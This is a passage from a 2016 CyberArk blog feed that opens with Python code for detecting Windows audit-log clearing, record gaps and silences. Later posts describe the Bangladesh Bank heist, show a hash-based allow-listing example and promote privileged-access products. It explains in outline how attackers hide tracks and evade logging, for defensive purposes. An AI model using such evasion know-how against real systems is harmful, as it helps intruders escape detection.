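down") are Microsoft's documented IDs; 4624, 4663 and 4672 are ordinary audit events.
"""
from datetime import datetime, timedelta
from typing import Any, Dict, List

AUDIT_LOG_CLEARED = 1102
EVENTLOG_SERVICE_SHUTDOWN = 1100

# Constructed sample of records as a collector might forward them.
SAMPLE_LINES = [
    "Time=2016-05-19T09:00:00 RecordID=1001 EventID=4624",
    "Time=2016-05-19T09:00:01 RecordID=1002 EventID=4672",
    "Time=2016-05-19T09:00:30 RecordID=1003 EventID=4663",
    "Time=2016-05-19T09:45:00 RecordID=1006 EventID=4624",  # 1004-1005 never arrived
    "Time=2016-05-19T09:46:00 RecordID=1007 EventID=1102",  # audit log cleared
    "Time=2016-05-19T09:47:00 RecordID=500 EventID=4624",   # record IDs restarted
]


def parse_records(lines: List[str]) -> List[Dict[str, Any]]:
    """Parse 'Time=... RecordID=... EventID=...' lines into typed records."""
    records = []
    for line in lines:
        fields = dict(tok.split("=", 1) for tok in line.split())
        records.append({
            "record_id": int(fields["RecordID"]),
            "event_id": int(fields["EventID"]),
            "time": datetime.fromisoformat(fields["Time"]),
        })
    return records


def check_continuity(records: List[Dict[str, Any]],
                     max_silence: timedelta = timedelta(minutes=30)) -> List[Dict[str, Any]]:
    """Flag conditions under which the forwarded log can no longer be trusted as complete."""
    alerts: List[Dict[str, Any]] = []
    prev = None
    for rec in records:
        if rec["event_id"] == AUDIT_LOG_CLEARED:
            alerts.append({"type": "audit_log_cleared", "record_id": rec["record_id"]})
        elif rec["event_id"] == EVENTLOG_SERVICE_SHUTDOWN:
            alerts.append({"type": "eventlog_service_stopped", "record_id": rec["record_id"]})
        if prev is not None:
            expected = prev["record_id"] + 1
            if rec["record_id"] > expected:
                # Records exist on the host that the SIEM never received (or were removed).
                alerts.append({"type": "record_gap", "missing_from": expected,
                               "missing_to": rec["record_id"] - 1})
            elif rec["record_id"] < expected:
                # EventRecordID only grows on a live log; a lower value means the log was
                # cleared, replaced or recreated. Confirm against a 1102 event.
                alerts.append({"type": "record_id_reset", "previous": prev["record_id"],
                               "record_id": rec["record_id"]})
            quiet = rec["time"] - prev["time"]
            if quiet > max_silence:
                # A host that normally logs constantly went quiet: auditing may have been paused.
                alerts.append({"type": "silence", "record_id": rec["record_id"],
                               "minutes": int(quiet.total_seconds() // 60)})
        prev = rec
    return alerts


if __name__ == "__main__":
    for alert in check_continuity(parse_records(SAMPLE_LINES)):
        print(alert)
```

None of these checks can prove that an individual record's contents are genuine, which is the risk the research describes; what they do is make the "stop, alter, resume" sequence visible at the collector, so that the off-host copy is at least known to be incomplete rather than silently trusted.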

Disclosure Timeline

  • April 12, 2016: Initial discovery by CyberArk Labs
  • April 28, 2016: Risk reported to Microsoft Security Response Center
  • April 28, 2016: Microsoft responded that it did not consider the submission a valid vulnerability because a user would need administrator privileges on the machine to execute the attack.*
  • May 19, 2016: Public disclosure

*According to Microsoft’s “Ten Immutable Laws of Security,” if administrator privileges are required, then the system is already compromised.
Lessons Learned from the Bangladesh Bank Heist https://www.cyberark.com/blog/lessons-learned-bangladesh-bank-heist/ Wed, 18 May 2016 13:14:42 +0000 https://www.cyberark.com/blog//

Most have been following the story about the Bangladesh Bank Heist. If you haven’t, here is the scoop and timeline. On May 15, 2015, three bank accounts were opened at the Rizal Commercial Banking Corporation (RCBC). Each of these accounts would lay dormant until Feb 4, 2016. Only later did authorities discover these accounts were all fake. It turns out cyber criminals who attempted to steal nearly $1 billion from the Bangladesh Central Bank had been planning the heist for nearly a year. Thanks in large part to a spelling error, however, the attackers made off with “only” $81 million of the total attempted amount.

100% of advanced cyber attacks exploit privileged accounts, and that’s true for this bank heist. Let’s take a look at the role of privileged accounts in this breach. After breaking through the perimeter, the attackers were able to successfully capture local administrative credentials from infected machines. Using the stolen privileged credentials, the attackers continued to escalate privileges and move laterally throughout the environment until they ultimately reached the SWIFT-connected systems.

The attackers used local admin rights to install monitoring software on the SWIFT-connected systems. This enabled them to gain persistent access to the systems, learn how the secure message platform worked and gain access to the SWIFT-issued digital certificates required to authenticate to the SWIFT network. With this access, the attackers used the stolen SWIFT credentials to send financial messages, thus initiating 35 fraudulent transactions. To stay hidden, the attackers used their admin privileges to remotely execute a specific advanced malware that was developed to hide tracks when attacking SWIFT systems. One of the malware’s actions disabled the printer that was configured to automatically print all sent and received messages in order to prevent employees from discovering the fraudulent transactions.

There have been a number of industry reports highlighting the dangers of not locking down privileged accounts. Following are some best practices that could have mitigated the breach:

  1. Standard business users should never have full local admin rights. Solutions, such as CyberArk Endpoint Privilege Manager, enable organizations to remove local admin rights while enabling users to elevate privileges when needed for approved tasks. Without local admin rights, it would have been difficult for the attackers to break in, move throughout the network and install malware.
  2. Secure privileged account credentials. This includes the credentials for the remaining local admin accounts on endpoints, domain admin credentials, privileged SSH keys and any other credentials that provide access to a sensitive account or system. This also could have included the SWIFT user credentials needed to access the digital certificates. By centrally securing privileged credentials, controlling access to these credentials based on role, and enforcing multi-factor authentication before granting access, the attackers would likely not have been able to get the credentials needed to laterally move through the environment, reach the SWIFT-connected systems or execute the fraudulent transactions. Even if attackers were able to harvest the credentials using keylogging malware or by stealing the hash, proactive credential rotation would invalidate the compromised credentials, making them useless to the attacker.
  3. Segment off highly sensitive systems from the rest of the IT network. This is often seen in retailers who have separate PCI environments, in utilities who separate and airgap their ICS systems, and it should be seen in central banks in their SWIFT-connected environments. For administration purposes, once these systems are separated from the standard IT network, remote access should only be permitted via a designated, secure and hardened jump server. Using this approach, organizations can tightly control access to these systems, better protect against credential harvesting techniques and prevent malware from jumping from user endpoints to sensitive systems. This separation also adds a valuable monitoring component, in that all administrative access to SWIFT-connected systems can be recorded.
  4. Monitor and analyze all privileged account activity. Privileged accounts protect the most sensitive data and assets, and as a last line of defense, security teams need to be able to quickly identify anomalous activity that could indicate an attack is in progress. In this case, had the Bangladesh Bank been monitoring SWIFT account activity, they could have been alerted to the abnormal login patterns, investigated what was going on, and stopped the attackers before they were able to execute 35 transactions.
  5. Lastly, by controlling applications on endpoints and servers, organizations can apply application whitelisting policies that meet their risk tolerance. By doing this, organizations can proactively prevent unknown and malicious software from infiltrating the environment and detect when new applications enter and spread throughout the environment. In this case, Bangladesh Bank could have recognized the malware during the earlier stages of the attack. For example, SysMon (the monitoring software) and the Evtdiag.exe (the malware that hides malicious tracks) could be blocked from running on the SWIFT-connected machines.
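
Application whitelisting comes up twice in this feed: the ICS post above describes locking down nodes so that only approved files run, and point 5 here applies the same control to SWIFT-connected machines. The block below is an added example written for this post, not CyberArk's product or any ICS vendor's enforcement mechanism: it models the decision such a control makes, by hashing the files on a freshly commissioned node into a baseline and then denying anything that is unknown or whose bytes have changed. Real products make this decision at process creation (a kernel driver, or Windows AppLocker and Software Restriction Policies); the file names, contents and the temporary directory are constructed for the example.

```python
"""Added example: a hash-based application allow-list check.

Illustrative code written for this post; it is not CyberArk's product or the
enforcement mechanism of any ICS vendor. Real allow-listing hooks process
creation (a kernel driver, or Windows AppLocker / Software Restriction
Policies); this script models the decision such a hook makes. All file
names and contents are constructed.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Record name -> SHA-256 for every file under root at 'known good' time.

    In practice this is done on a freshly commissioned node before it is
    connected to anything, and the baseline is signed and kept off the node.
    """
    return {p.name: sha256_of(p) for p in sorted(root.iterdir()) if p.is_file()}


def decide(path: Path, baseline: Dict[str, str]) -> str:
    """Return the enforcement decision for a single executable."""
    expected = baseline.get(path.name)
    if expected is None:
        return "deny:unknown"      # never approved: default deny
    if sha256_of(path) != expected:
        return "deny:modified"     # approved name, but the bytes changed
    return "allow"


def demo() -> Dict[str, str]:
    """Build a baseline, simulate drift after commissioning, evaluate every file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "hmi.exe").write_bytes(b"approved HMI binary v1")
        (root / "scada_client.exe").write_bytes(b"approved client binary v3")
        baseline = build_baseline(root)
        # Drift: a new file appears and an approved one is altered in place.
        (root / "unknown_tool.exe").write_bytes(b"dropped later, never approved")
        (root / "hmi.exe").write_bytes(b"approved HMI binary v1 with extra bytes")
        return {p.name: decide(p, baseline) for p in sorted(root.iterdir())}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:14} {name}")
```

Keying the baseline by file name as well as hash is what lets the check distinguish "unknown software" from "approved software that has been tampered with"; the second verdict is the one that should page someone, because it means something already had write access to an approved binary.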

While this attack had a serious outcome and required advanced planning, the attack methods used were not very sophisticated. With the proper tools and policies, this likely could have been prevented. For example, CyberArk’s proactive privileged account controls could have made it far more difficult for the attackers to get into the SWIFT environment to begin with, and advanced detection capabilities would likely have detected the anomalous login activity and alerted the security team that something was wrong.
Video: The Cyber Attack Lifecycle https://www.cyberark.com/blog/video-the-cyber-attack-lifecycle/ Thu, 12 May 2016 11:19:31 +0000 https://www.cyberark.com/blog//

A recently published Ponemon study revealed that 63 percent of organizations have experienced an advanced attack within the last 12 months. Industry reports note an average time of 146 to 170 days to detect an attack, 39 days to contain it and 43 days to remediate. Time seems to be on the side of an attacker.

Motivated attackers will find a way to break through the network perimeter – but how are they able to prolong their undetected presence once inside? CyberArk has a dedicated team that studies and analyzes attacks that occur in the wild. Based on ongoing research and findings, we’ve learned that in most attack scenarios, there is a clear attack path that cyber criminals follow to help hide their tracks. Privileged accounts are at the center of this path.

In a short, three-minute video, our Senior Product Marketing Manager Jessica Stanford outlines each key phase of this attack lifecycle:

[Video: The Cyber Attack Lifecycle]

How common is this? In a highly publicized, first-ever talk by the head of the NSA’s Tailored Access Operations – the US government’s top hacking team responsible for breaking into the systems of foreign adversaries – Rob Joyce detailed each phase of a typical attack. When talking about the “reconnaissance phase,” a theme immediately emerged: the privileged credentials of network administrators and others with high levels of network access are critical for gaining access to key systems, and ultimately, the heart of the enterprise. He stressed the importance of establishing processes and procedures to closely monitor what is going on inside the network – making sure to understand what is normal and what isn’t. For example, are authorized users going to normal places within the network and operating under the norms of those particular credentials? Are they accessing new or different things that they shouldn’t be?

Joyce also revealed that his team “loves” to find admin or other credentials hardcoded into scripts or devices, as they provide covert pathways for attackers to move laterally throughout a network. He specifically noted Pass-the-Hash attacks, commenting with the right credentials, attackers “can pivot like mad throughout the network.” He warned that even temporary “cracks” – small vulnerabilities that only exist for a few hours – are exactly what advanced attackers seek. Even the smallest “crack” of one stolen credential can be enough to take down an entire organization if proper security measures are not in place. If that’s the case, think of the irreversible damage that can be done in 146+ days!

With privilege clearly at the heart of the cyber attack lifecycle, we encourage you to learn more about how CyberArk solutions can help your organization break the chain with privileged account security and detect attacks sooner. You can learn more here.

Conjur heads to Puppet Camp New York https://www.cyberark.com/blog/conjur-heads-to-puppet-camp-new-york/ Thu, 12 May 2016 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-heads-to-puppet-camp-new-york/  

Puppet Camp New York is May 17th, and we had such a great time at Puppet Camp Dallas last month that we couldn’t resist. Our VP Josh Bregman is returning to the camp stage to spread the word about “The 5 Stages of Secrets Management Grief [And How To Prevail].” Josh will walk through the five emotional phases you go through when grappling with sensitive data in your organization, and highlight tools to help you minimize secrets management risk while maintaining your Puppet workflows.

Puppet Camps are one-day events packed with great speakers. You can discover different ways Puppet can be used, and connect with other Puppet practitioners in your area. Interested in learning more about what to expect at Puppet Camp? Check out our interview with Puppet Labs’ Grace Stiller where we talk about everything the camps have to offer.

Going to be at Puppet Camp in New York? Head over to Josh’s talk, and don’t be shy! Tweet him or email him at josh.bregman@conjur.net.
Do Business Users Understand the Concept of Least Privilege? https://www.cyberark.com/blog/do-business-users-understand-the-concept-of-least-privilege/ Tue, 10 May 2016 08:13:09 +0000 https://www.cyberark.com/blog//

No, they don’t. They only experience the pain of inefficiency if least privilege isn’t set up appropriately to meet authorized business needs. I know this firsthand. Prior to joining CyberArk, I worked in a home office for a small company based in NYC. I quickly learned how to be self-sufficient and relatively tech savvy due to limited access to our remote IT support. Eventually, that company was acquired by a large global enterprise, and I received a new laptop with a new set of headaches.

We didn’t have admin rights to our laptops. Now that I work for a cyber security company, I understand the concept of least privilege and why this is a best practice. However, at that time, I just thought it was an example of the “formality” (bureaucracy) of a large global company. It was painful at times.

A classic example – trying to jump on a webinar only to discover I no longer had the latest version of a Java update. Ugh. At that time, I worked with a global team across multiple time zones, so I spent hours each day on conference calls and participating in WebEx meetings. Taking time to contact the IT Help Desk for something I could have done quickly on my own (e.g. update Java, connect to home office printer) if I had admin rights on my laptop was the last thing I had time to do. Consider the following process to submit an IT ticket even for something “simple”:

  1. First you have to write the ticket. I included screenshots as needed. (That takes a few minutes.)
  2. Then you receive at least one automated response to confirm receipt of the request, and another email once it is assigned to someone for follow-up. (Clogs up the email inbox.)
  3. Then IT gets in touch to set up a time to address the situation. It may or may not be the same day, and in any case it is too late for the WebEx meeting, even if I called the help desk. (Frustrating!)
  4. Finally, you are on the phone with the Help Desk, and now you have to explain the problem again, even though it was pretty well documented in email. (Time consuming.)
  5. Next it takes a few minutes for IT to get remote access set up. (Time consuming.)
  6. Finally they can poke around, which means you are not using your laptop or working.

The above steps were probably at least 30 minutes in total (elapsed over time) for even a quick request. I was grateful for IT help, but I just didn’t have time for all of the extra steps. Frankly, IT didn’t have time for this either. They were a small team supporting a global company.

Fast forward to 2015 when I learned about CyberArk Viewfinity. I immediately understood the concept of least privilege and application control. Love the concept of whitelisting and greylisting – and IT must love this too! End users may not get the concepts, but believe me they will be very happy to have access to the applications they need – when they need them – without contacting IT for simple updates. The IT Help Desk will be happy not to have to address mundane tasks that skew their performance metrics. They can spend time on other projects.

Furthermore, the IT security team will appreciate that with CyberArk Viewfinity in place, users are only able to elevate privileges for pre-approved tasks, and complementary application controls are in place to quickly identify and block any malicious applications that attempt to avoid defenses by operating without administrative privileges.

In a short 3 minute video, CyberArk’s Senior Product Marketing Manager Lauren Horaist offers recommendations on how to effectively manage local admin rights on endpoints. Watch it to learn how to strengthen security and reduce the attack surface without disrupting the authorized day-to-day tasks of business users.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.
How to Address New MFA Requirements in Payment Card Industry Data Security Standard 3.2 https://www.cyberark.com/blog/how-to-address-new-mfa-requirements-in-payment-card-industry-data-security-standard-32/ Fri, 06 May 2016 09:26:45 +0000 https://www.cyberark.com/blog//

If you have any lingering doubt about the significant role privileged accounts play in advanced cyber attacks, consider the fact that yet another security authority updated requirements to expand the security controls prescribed for privileged accounts. Last week, the PCI Security Standards Council released version 3.2 of their Payment Card Industry Data Security Standard (PCI DSS). One of the key changes in PCI 3.2 is the additional requirement of multi-factor authentication (MFA) for administrators accessing the cardholder data environment (CDE).

PCI DSS is a global standard focused on protecting cardholder data. Extending the standard to require multi-factor authentication for privileged users who are responsible for securing, managing and accessing the databases, servers and applications that contain sensitive cardholder data is a good move.

It’s no secret that attackers seek privileged accounts in order to gain access to sensitive, confidential information. This is how they successfully accomplish their mission. We’ve seen many regulations and standards add and expand controls that require organizations to protect access to privileged accounts, secure and monitor usage of these sensitive accounts and identify suspicious privileged activity.

After reviewing the full text of the updated PCI DSS requirement 8.3 “Secure all individual non-console administrative access and all remote access to the CDE using multi-factor authentication,” it’s clear that the PCI Security Standards Council has outlined two options for organizations to meet this requirement. The first option is to enforce MFA at the point of access to the CDE. The second option is to enforce MFA at every individual system and application within the CDE.

Rolling out MFA across every individual system and application can be challenging – deploying, integrating and managing that architecture would be time-consuming, and most likely, headache-inducing. The easier and more secure method is to enforce MFA at the point of access to the CDE. This is exactly what CyberArk has been doing for years to help organizations secure privileged access to sensitive data.

By implementing MFA at the network level, it’s not only easier to deploy and manage, but organizations also get additional security benefits. With a single point of entry for all privileged access to the CDE, organizations can control, isolate and monitor all administrative sessions. This is particularly important for remote users and third-party vendors accessing cardholder data environments – PCI 3.2 specifies that MFA is required for both internal and third-party access.

With this approach, CyberArk can help organizations to address the latest requirements in PCI 3.2 by enforcing MFA for administrators when they access the CyberArk solution. Through the CyberArk C3 Alliance, CyberArk has developed a number of out-of-the-box integrations to support a range of multi-factor authentication methods.

Read more about how CyberArk solutions help organizations address PCI standards here.
Video: How to Effectively Manage Local Admin Rights on Endpoints https://www.cyberark.com/blog/video-how-to-effectively-manage-local-admin-rights-on-endpoints/ Wed, 04 May 2016 07:57:27 +0000 https://www.cyberark.com/blog//

Facing a myriad of risks including the proliferation of malware and successful phishing, organizations continually look for ways to strengthen security and more effectively manage local admin rights on endpoints.

Finding the right balance is a challenge for organizations as they consider the best options to mitigate the risk of a breach. The goal is to reduce the attack surface without disrupting the authorized day-to-day tasks of business users. If an organization entirely removes local admin rights from users, then users are frequently prevented from accomplishing certain tasks necessary in their day-to-day jobs. This leads to frustrated end users, an overwhelmed support team and high help desk costs. If an organization allows users to maintain local admin rights, the machine, and by default the network, are open to a range of attacks. Given the tradeoffs, organizations often struggle with how to best balance security needs with productivity and usability requirements.

In a short video, CyberArk’s Lauren Horaist, senior product marketing manager, weighs the pros and cons of the options to manage local admin rights. She also explains how CyberArk Viewfinity enables organizations to enforce flexible least privilege policies for business and administrative users, as well as control what applications are allowed to run. Using CyberArk Viewfinity, organizations can revoke everyday local administrator privileges from business users while seamlessly elevating privileges when required by trusted applications.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.
C³ Alliance Global Technology Partner Program: A Q&A with CyberArk’s Alliances Technology Expert https://www.cyberark.com/blog/c3-alliance-global-technology-partner-program-a-qa-with-cyberarks-alliances-technology-expert/ Tue, 03 May 2016 14:20:32 +0000 https://www.cyberark.com/blog//

The C3 Alliance Global Technology Partner Program brings together key enterprise and security software companies to deliver integrated, tested solutions to better protect our shared customers, making it easier to extend the power of privileged account security across an organization and enhance the overall security posture.

With the launch of the C3 Alliance, it’s a perfect time to learn more about how CyberArk works with partners to integrate technology with CyberArk’s Privileged Account Security Solution. Edward Nunez, an alliances technology expert on CyberArk’s Business Development team, knows this process well, so we asked him a few questions to better understand what’s involved.

How does CyberArk work with its partners to integrate technology?

Through the C3 Alliance, we work with partners to integrate a wide range of security products with the CyberArk Privileged Account Security solution. We provide access to CyberArk resources and expertise. This includes the tools, training resources, documentation and cloud-based environments they need to develop, test and enhance their offerings. We offer advice on best practices to ensure that the integration is developed with the highest security standards in mind. Not only do we provide our partners with the tools and resources needed to succeed, but we also provide support. For example, if they face challenges or need to troubleshoot any issues, we are there to help – whether it be to provide guidance directly or to identify internal resources that can address the problem.

Can you talk about the development phase? What’s typically involved?

We work closely with our partners – from the initial design phase through testing and certification – to ensure that the integrated technologies meet the requirements of our mutual customers and provide value-added solutions. We kick off the development process with an initial design phase, which involves a discussion with our partner on the planned architecture, integration details, etc. We then establish a regular review process to ensure the partner is fully supported along each step of the way. At the end of the development phase, we hold an in-depth demonstration and working session with our partner and our product managers for a quality assurance review and certification.

Do you have any advice to offer companies that want to join the C3 Alliance?

Yes, consider the role privileged account security plays in the incident response field and the different venues for integration offered by CyberArk. The options range from gaining access to detailed privileged activity data/alerts to securing and managing credentials via CyberArk.

Partners should also align with requests and feedback from the field to validate priorities. There are use cases where mutual customers have requested specific integrations to ensure access to credentials is secure. Some partners may start with securing and managing credentials for specific solutions and expand use cases from there. Considering the possibilities and feedback from the field is helpful as we brainstorm on the different use cases for integration with our partners. 

C3 Alliance members represent enterprise software, infrastructure and security solutions, including security information and event management (SIEM), identity and access governance, asset and vulnerability discovery, security management and authentication services that benefit from tighter integration with CyberArk for securing privileged accounts and using privileged data to detect and respond to threats.

We encourage companies interested in joining the C3 Alliance to contact us at Business_Development@cyberark.com to start exploring ideas and possible use cases for integration.
SSH Keys: The Overlooked Cyber Security Attack Vector https://www.cyberark.com/blog/ssh-keys-the-overlooked-cyber-security-attack-vector/ Thu, 28 Apr 2016 12:57:59 +0000 https://www.cyberark.com/blog//

In a recent CyberArk blog, we explored the critical role SSH keys play in establishing trust between systems, encrypting communication between such systems, and facilitating strong authentication and secure transactions. Despite the critical role SSH keys play, many organizations inadvertently ignore SSH key vulnerabilities and underestimate the prevalent use of SSH within an enterprise.

One particular area where SSH key security may be overlooked is within an organization’s Unix/Linux environment. Often accessed by privileged users outside of the security realm, these systems house some of an enterprise’s most sensitive assets – from databases and FTP servers to web and cloud applications. While many organizations take steps to protect the root user accounts on these systems, individual accounts and credentials – including SSH keys – used to gain root privileges are often overlooked by security teams. This can leave an organization vulnerable to both malicious and accidental damage to critical systems.

This infographic illustrates the powerful, privileged access SSH keys establish. You’ll also find actionable tips for mitigating risks of cyber attacks in Unix/Linux operating environments. To learn more about locking down SSH keys, please visit www.CyberArk.com/SSH for a library of free resources including a White Paper from IDC: Market Spotlight: Minimizing Cybersecurity Risk with Vigilant SSH Key Management.

SSH Infographic
Enterprise Software, IT Security and Services Providers Build on the Power of Privileged Account Security to Better Protect Customers from Cyber Threats https://www.cyberark.com/blog/enterprise-software-it-security-and-services-providers-build-on-the-power-of-privileged-account-security-to-better-protect-customers-from-cyber-threats/ Wed, 27 Apr 2016 12:33:33 +0000 https://www.cyberark.com/blog//

It’s widely known that 100% of advanced cyber attacks exploit privileged accounts. The number of privileged accounts in an organization is typically three-to-four times the number of employees. Privileged accounts are found in every software and hardware solution – basically everything with an IP address also has a privileged account.

Given the significance of privileged credentials and the prevalence of them across an organization, IT, security managers and even application developers must scrutinize the following questions as part of a comprehensive security program:

  • Are all credentials used to access privileged accounts managed securely? (e.g., rotated based on security policies)
  • Are privileged credentials used by different applications to access sensitive network resources secure?
  • Do we have a policy-driven approach to identity and access management across all users, ensuring the right users have the right privileges? (i.e., policies to avoid excess privileged permissions/entitlement creep)
  • When an attacker breaches the network perimeter, how do we mitigate risk – to ensure they can’t move laterally and elevate privileges to gain access to sensitive resources?
  • Can our SIEM solution monitor and identify critical threats associated with privileged activities?

No matter where privileged credentials reside in an IT environment, they should be secured and managed. Moreover, privileged account activity data should be strategically utilized to protect an organization from the most advanced cyber threats. Companies cannot afford to have a myopic view of privileged account security. Likewise, enterprise software, IT security and services providers must collectively and strategically work together within an ecosystem to address the rapid and ongoing evolution of advanced cyber security threats.

Today CyberArk launched the C³ Alliance, our new Global Technology Partner Program. By partnering with best-of-breed enterprise software, IT security and services providers, we leverage our combined skills and expertise to offer solutions that enable our customers to better secure their environment while maximizing their existing security and IT investment particularly in the areas of proactive protection, detection and threat response.

For example, the CyberArk Privileged Account Security Solution can be used to secure and manage privileged credentials accessed by users as well as those used by a multitude of applications (see CyberArk Secured™). Further, customers can leverage CyberArk privileged account data to gain more valuable insights to detect, alert & rapidly respond to cyber attacks (see CyberArk Connected™).

The C³ Alliance features more than 30 certified partner integrations and more than 170 validated plug-ins, many derived from customer requirements. As a result, our mutual customers will be able to:

  • Automatically secure and manage privileged credentials, used by individuals or applications, across integrated solutions
  • Gain centralized, enterprise-wide, real-time visibility to monitor and identify critical security threats associated with privileged activity
  • Benefit from an integrated, policy-driven approach to identity and access governance across all users
  • Reduce complexity and time required to implement with pre-integrated, certified and tested solutions

We will continue to work hard to deliver innovative solutions with the C3 Alliance members. Additional information about our technology partners is available here.

C³ Alliance Program Overview
On-Premises or in the Cloud, Privileged Accounts Must be Protected https://www.cyberark.com/blog/on-premises-or-in-the-cloud-privileged-accounts-must-be-protected-2/ Thu, 21 Apr 2016 12:14:32 +0000 https://www.cyberark.com/blog//

Businesses continue to adopt a “cloud-first strategy” at an accelerated pace. Consider the following stats from IDC Research highlighted by the Wall Street Journal:

  • Worldwide spending on public cloud services is estimated to grow by a 19.4% compound annual rate over the next four years, to $141 billion in 2019, from $70 billion in 2015.
  • Over that period, businesses are expected to spend six times more on public cloud services than they do on overall information technology.
  • Software-as-a-Service will remain the dominant cloud tool used by businesses in the years ahead, attracting two thirds of total spending on public cloud.

As enterprise businesses increasingly shift technology applications and infrastructure to the cloud, privileged accounts in public, private and hybrid cloud environments grow exponentially. No matter where they “live” – on-premises or in the cloud – privileged accounts need to be protected.

Watch this 60-second video to learn how CyberArk Privileged Account Security can help IT and security teams overcome the challenges of managing these powerful accounts and secure cloud environments including Infrastructure-as-a-Service and Software-as-a-Service. Unique capabilities of the solution include credential protection, session security and continuous monitoring to deliver a layered approach to securing privileged accounts in the cloud.
Winner of CyberArk’s 2016 RSA Conference Booth Sweepstakes Announced https://www.cyberark.com/blog/winner-of-cyberarks-2016-rsa-conference-booth-sweepstakes-announced/ Mon, 18 Apr 2016 13:46:35 +0000 https://www.cyberark.com/blog//

Regular readers of the CyberArk blog know that this year’s RSA Conference was jam packed for our team with news of new products and innovation, exciting new initiatives with our partners and meetings with customers and prospects. We had a record number of attendees visit the CyberArk booth, seeking ways to mitigate risk and proactively protect against stolen privileged credentials, Kerberos attacks, malicious insiders, Golden Ticket attacks and Pass-the-Hash attacks.

We also invited conference attendees to enter a sweepstakes for this year’s booth prize.
We decided to try something different this year. Our booth sweepstakes offered a chance for one lucky person to win $10,000 to be donated to a charity of his or her choice. The idea was well-received, with many attendees commenting on the refreshing change from the usual conference giveaways.

Today, we are thrilled to announce our winner, Cathy Hammond. Cathy has chosen the American Cancer Society’s Relay for Life, a charity with a cause very near and dear to her heart.

Cathy explains, “I am a breast cancer survivor, and I know too many people whose lives have been touched by cancer. I can’t sit still and not take action against this disease that has hurt so many. That’s why I participate in the American Cancer Society Relay for Life. Relay For Life is my opportunity to celebrate loved ones who have won their battle against cancer, remember those no longer with us, and fight back against this disease that robs so many of so much. The money donated by CyberArk to Relay for Life will bring us one step closer to a world with less cancer and more birthdays.”

Thank you, Cathy, for sharing your story and for donating to the American Cancer Society, an important organization supporting cancer research, patient services, early detection, treatment and education.
Tough Lesson to Learn: Privileged Controls Must Be Part of the “Security 101 Checklist” https://www.cyberark.com/blog/tough-lesson-to-learn-privileged-controls-must-be-part-of-the-security-101-checklist/ Wed, 13 Apr 2016 08:08:25 +0000 https://www.cyberark.com/blog//

In March 2016, the cyber security community collectively winced when it was discovered that hackers breached the servers of DDoS protection firm Staminus and placed sensitive data online for the whole world to see.

The Staminus data breach occurred on March 10, after hackers gained access to the company’s back-end servers and reset them to their original factory settings. This took down the entire network, and the hackers then used Hastebin, an anonymous text-sharing site, to publish the stolen information from Staminus’ database.

Staminus’ clients need to be aware of potential credit card issues and the need to reset all their account passwords. The leaked data also includes customer support tickets, server log data, chat logs and the source code of some of the company’s services.

The Staminus breach is a painful lesson that revealed several internal security flaws, such as unpatched systems, exposed telnet, credit card data stored in plaintext and the use of the same password for all root accounts. This is a stark reminder of what can happen when an organization doesn’t employ privileged controls as part of its basic security controls.

Privileged account security must be part of an organization’s “Security 101 Checklist.” Along with patching, firewalling and encrypting sensitive data, privileged credentials need to be unique, complex and rotated.

Effective protection requires implementing an automated process to change hard-coded or embedded passwords for scripts and service accounts, as well as enforcing a policy of “least privilege” that ensures users have only enough privileges required to do their job.

It’s been stated many times – it’s not a matter of if a breach will occur, it’s when. That’s why organizations must take a proactive and layered approach to mitigate risks.

CyberArk’s Director of Consulting Services Gerrit Lansing wrote an article last November highlighting a few best practices for locking down credentials “Proactive Preventive Measures or Remediation: Same Actions, Different Timing.” It’s worth a quick read for a reminder of basic best practices.

If you are just getting started, consider using our Discovery and Audit Tool to identify where privileged accounts exist within your organization and assess your risk profile. Research from CyberArk Labs found that 88% of the networks scanned were found to be significantly susceptible to compromise through privileged account credential theft or abuse.
Service Providers: a Weak Link in an Organization’s Cyber Security Program? https://www.cyberark.com/blog/service-providers-a-weak-link-in-an-organizations-cyber-security-program-2/ Fri, 08 Apr 2016 13:26:53 +0000 https://www.cyberark.com/blog//

Vendor-related IT security is a well-documented concern within the cyber security industry. In exploring the main cyber security challenges with third-party vendors, a recent Mandiant report highlights several issues associated with attacks stemming from IT outsourcing (ITO).

According to the report, a compromised ITO service provider can enable an attacker to shortcut the Targeted Attack Lifecycle and execute an advanced attack. When an attacker infiltrates a targeted company’s network using the compromised ITO infrastructure, they have essentially skipped the first three phases of the lifecycle including the need to craft an exploit, like a spear phishing email.

“This shortcut allows the attackers to scale, improving efficiency and reducing efforts required to complete their missions…We expect this trend to continue until the cost of operating through outsourced service providers becomes too great for the attack groups to bear.”
M-Trends 2016

The Mandiant report also noted organizations are frequently in the dark with regard to the security capabilities of a vendor’s network. Often organizations struggle to answer the basic questions of a vendor’s security posture:

  • Do they have a security operations center?
  • Do they have encryption?
  • Have they ever experienced a breach?

Ideally, organizations should have answers to these and other questions before letting their vendors inside their firewalls.

The problem of vendor security is so serious that the New York State Department of Financial Services (NYDFS) released a report focusing on potential cyber security vulnerabilities with banks’ third-party vendors.

According to the NYDFS, banks that rely on third-party vendors for a broad range of services often don’t realize or account for the fact that those third-party firms frequently have access to a financial institution’s information technology systems, providing a potential point of entry for hackers.

Among other findings, the NYDFS report found that nearly 1 in 3 banks surveyed do not require their third-party vendors to notify them of cyber security breaches. NYDFS expects to move forward on regulations to strengthen cyber security standards for banks’ third-party vendors, but vendors and service providers across all industries need to do more to address the issues.

Despite these vendor-related cyber security issues, companies can mitigate the risks associated with a breach in a proactive and effective manner. Taking basic steps to protect and manage credentials used by third parties, and securing and monitoring remote vendor sessions, can go a long way in protecting target organizations without inconveniencing vendors. By implementing such controls, organizations will have better oversight of security and avoid slipshod or ineffective security practices associated with their service providers.

One key tip that the M-Trends 2016 report recommends with vendor security is to monitor the use of privileged accounts.

“Monitor the use of privileged accounts, including those associated with outsourced service providers. Attackers target privileged accounts such as local administrator, domain administrator, and service accounts.”

The bottom line for taking control of security within a vendor relationship is to avoid leaving the credentials under full control of the vendor or your own internal users for that matter.

